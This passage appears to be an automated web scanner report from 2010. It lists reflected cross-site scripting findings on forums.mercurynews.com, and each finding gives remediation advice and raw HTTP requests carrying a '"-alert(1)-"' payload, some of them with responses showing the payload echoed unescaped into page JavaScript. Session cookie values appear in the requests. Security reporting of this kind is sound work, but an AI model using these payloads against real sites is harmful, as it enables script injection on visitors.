Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22276
3.90. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:50 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22243
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:28 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22160
3.93. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/645-sri-lanka-and-thailand-9-1-2010
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22150
3.96. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/about-gold-price-and-inflation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 95450
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22132
3.99. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/al-qaida-is-us-puppet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98974
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:02 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s.events="event1"; s.eVar2=getCiQueryString("SOURCE"); s.eVar4=s.pageName; s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:12 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/ferret-theory-lv
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:51 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21162
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s.events="event1"; s.eVar2=getCiQueryString("SOURCE"); s.eVar4=s.pageName; s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
